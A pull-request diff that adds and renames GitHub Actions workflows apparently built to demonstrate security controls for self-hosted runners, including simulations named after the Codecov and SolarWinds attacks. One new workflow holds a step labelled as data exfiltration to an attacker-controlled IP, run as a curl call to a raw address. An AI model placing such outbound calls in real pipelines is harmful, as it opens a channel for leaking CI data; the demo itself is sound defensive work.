Merge pull request step-security#149 from step-security/add-workflows

Add ARC workflows

Author: varunsh-coder

.github/workflows/arc-codecov-simulation.yml

@@ -1,7 +1,7 @@
-name: ARC Codecov Simulation
+name: 3. ARC Codecov Simulation
 on:
   workflow_dispatch:
-
+      
 jobs:
   arc-codecov-simulation:
     runs-on: self-hosted

.github/workflows/arc-secure-by-default.yml

@@ -0,0 +1,21 @@
+name: 2. Secure-By-Default ARC Cluster-Level Policy
+on:
+  workflow_dispatch:
+
+jobs:
+  direct-ip-hosted:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+
+      # Codecov Scenario: Exfiltrate data to attacker's IP address
+      - name: Data Exfiltration To Attacker Controlled IP address
+        run: curl 104.16.209.12 -L
+  direct-ip-arc:
+    runs-on: self-hosted
+    steps:
+      - uses: actions/checkout@v3
+
+      # Codecov Scenario: Exfiltrate data to attacker's IP address
+      - name: Data Exfiltration To Attacker Controlled IP address
+        run: curl 104.16.209.12 -L

.github/workflows/arc-solarwinds-simulation.yml

@@ -1,4 +1,4 @@
-name: ARC SolarWinds Simulation
+name: 4. ARC SolarWinds Simulation
 on:
   workflow_dispatch:
 

.github/workflows/arc-zero-effort-observability.yml

@@ -0,0 +1,14 @@
+name: 1. Zero-effort Observability
+on:
+  workflow_dispatch:
+
+jobs:
+  observability:
+    runs-on: self-hosted
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/checkout@v2
+
+      - name: Build Docker image
+        run: docker build .